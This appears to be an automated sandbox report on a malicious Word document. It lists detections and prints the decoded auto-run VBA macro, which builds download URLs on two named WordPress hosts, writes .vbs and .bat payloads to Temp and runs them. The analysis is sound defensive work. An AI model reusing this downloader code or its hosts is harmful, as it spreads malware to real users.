MALICIOUS
370
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains multiple VBA macros, including AutoOpen and Auto_Open, which are commonly used to execute malicious code upon opening the document. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, and the script attempts to construct URLs to download content. Specifically, it constructs URLs like 'http://dillardvideo.com/wp-admin/network/5716367236.txt' and 'http://diputacion.ardinova.com/wp-admin/images/screenshots/5716367236.txt' to fetch a second-stage payload.
Heuristics 11
-
ClamAV: Doc.Macro.ObfuscatedHeuristic-5931994-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ObfuscatedHeuristic-5931994-0
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6359 bytes |
SHA-256: dc28bc20a1b4f24a0c4e6c20739d43e7f38fd4daca897520677f50a580d587de |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
Bbhjaadaba
End Sub
Sub Bbhjaadaba()
BHJABDW = "qwndk nqwjkhdkjh21 jdkh1l kjdlasd"
Itkadata
End Sub
Sub AutoOpen()
Bbhjaadaba
End Sub
Sub Itkadata()
Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String
Dim PBIn As String, ADANADA As String, STT2 As String, eDate As Date, CONT As String
Dim Ndjs As Integer, BHQJGHDS As String, MNHDSDAAA As String
Dim ABTH As String, BBTH As String
Dim klmn As Integer, TTKK As String
Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
'eDate = ""
MNHDSDAAA = spb(92)
ADANADA = Samsung(9898)
BHQJGHDS = "Temp"
PH2 = Module2.Kalyma(BHQJGHDS) + MNHDSDAAA
ART = 315
BFT = 316
Randomize
eDate = #2/12/2010#
Ndjs = Int(Year(eDate)) - 1938
ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs)
ATTH = ATTH + "://"
TSTS = ".tx" + ""
TSTS = TSTS + "t"
CDDD = "5716367236" + TSTS
LNSS = "pipi" + TSTS
STT1 = "dillardvideo.c" + "om/w" + "p-admin/network/"
STT2 = "diputacion.ardinova.c" + "om/w" + "p-admin/images/screenshots/"
PBIn = ATTH + STT1 + CDDD
CONT = Module2.Huqwhdkjqwl(PBIn)
BHJD = Right(CONT, 15)
hdjshd = InStr(1, BHJD, "exit")
If (hdjshd = 0) Then
NJKQWD = ""
PBIn = ATTH + STT2 + CDDD
CONT = Module2.Huqwhdkjqwl(PBIn)
NFBH = Module2.Huqwhdkjqwl(ATTH + STT2 + LNSS)
Else
NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS)
End If
Module2.Crispy (1)
CPLRP1 = "pioneer"
CPLRP2 = "paytina"
CPLRP3 = "cranb" + "erry"
CONT = Replace(CONT, CPLRP1, PH2, 1)
CONT = Replace(CONT, CPLRP2, NFBH, 1)
CONT2 = Replace(CONT, CPLRP3, ADANADA, 1)
TTKK = "$"
klmn = CInt(Len(CONT2))
For i = 1 To klmn
If (Mid(CONT2, i, 1) = TTKK) Then
If (Mid(CONT2, i - 1, 1) = TTKK) Then
GEFORCE1 = Mid(CONT2, 1, i - 2)
GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
End If
End If
Next i
HQUJD = ".v"
ABTH = PH2 + ADANADA & HQUJD + "bs"
BBTH = PH2 + ADANADA + ".bat"
Open ABTH For Output As #ART
Print #ART, GEFORCE1
Close #ART
Module2.Crispy (1)
Open BBTH For Output As #BFT
Print #BFT, GEFORCE2
Close #BFT
Module2.Crispy (1)
QUHDQ = Module2.Fuflmdjoo(BBTH)
Module1.Hameleon
End Sub
Sub Workbook_Open()
YUGDASD = "asdhjkh qwgdjhqwg d"
Bbhjaadaba
End Sub
Public Function NHdjhasbdhas(a As Object)
NHdjhasbdhas = (a.responsetext)
End Function
Public Function Samsung(a As Integer)
Randomize
Samsung = CStr(Int((a / 2 * Rnd) + a))
End Function
Public Function Creasqwdqwjdk(a As String)
Creasqwdqwjdk = CreateObject(a)
End Function
Public Function spb(sps As Integer)
JQHKJDJAS = "qhdkj qhwdjkhqw d"
spb = Chr(sps)
End Function
Public Function Stkjrhbs(a As Integer)
Stkjrhbs = Sgn(a)
End Function
Attribute VB_Name = "Module1"
Sub Hameleon()
Dim pps As Integer
Dim charCount As Integer
charCount = ActiveDocument.Characters.Count - 1
BHDW = "k"
BHJBQDSD = "asdn,qwmndk1kn2kd 1klh h1j2 kd"
JFQW = "t"
pps = 0
Do While True
pps = pps + 1
If (ActiveDocument.Characters(pps) = BHDW) Then
BHFJABSDX = "wqdklj qlkwjdkl21jkdl1j djkh12kdh sd"
If (ActiveDocument.Characters(pps - 1) = JFQW) Then
ActiveDocument.Range(Start:=0, End:=pps).Delete
ActiveDocument.Range(Start:=0, End:=charCount - pps - 1).Font.ColorIndex = wdBlack
Exit Do
End If
End If
If (pps = charCount) Then
Exit Do
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.